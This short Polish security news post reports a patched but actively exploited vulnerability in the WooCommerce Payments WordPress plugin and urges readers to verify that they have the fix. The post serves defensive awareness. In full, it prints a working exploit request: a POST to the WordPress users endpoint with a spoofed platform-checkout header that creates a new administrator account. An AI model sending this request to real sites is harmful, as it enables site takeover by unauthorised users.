Ciekawa podatność w pluginie do płatności WooCommerce – można jednym nagłówkiem utworzyć nowego admina w WordPress

Podatność w pluginie WooCommerce payments (obecnie ~600k instalacji) została załatana parę miesięcy temu, ale teraz pokazała się ciekawa analiza tej luki. Ponoć podatność jest obecnie aktywnie wykorzystywana.

Dobra informacja jest taka, że producent wydał łatkę z wymuszeniem jej instalacji. Warto sprawdzić czy jesteśmy załatani, bo exploit jest naprawdę prosty i wygląda tak:

POST /wp-json/wp/v2/users HTTP/1.1
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/json
X-CPAY-PLATFORM-CHECKOUT-USER: 1
Content-Length: 123

{
„username”:„hacked”,
„email”:„mrtuxracer@hackerone.com”,
„password”:„SuperSecure1337”,
„roles”:[„administrator”]

}

Lista załatanych wersji pluginu dostępna jest tutaj.

~ms